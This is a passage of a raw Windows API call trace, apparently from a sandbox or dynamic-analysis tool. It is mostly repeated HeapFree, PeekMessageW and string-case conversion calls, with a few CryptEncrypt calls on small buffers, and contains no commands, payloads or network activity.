[0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.819] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.819] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.823] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.823] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.823] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.823] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.823] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.823] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.823] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1868*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1868*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.824] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.824] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.824] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.824] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.825] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.825] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.826] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0251.826] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.826] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0251.826] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.826] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.826] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.826] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.827] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.827] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.827] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.827] CryptDestroyKey (hKey=0xaa5760) returned 1 [0251.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.827] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.827] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.827] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.827] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.827] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.827] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.827] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.827] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.827] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.828] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.828] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.828] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.829] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.829] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.829] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.829] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.829] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.830] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.830] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.830] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 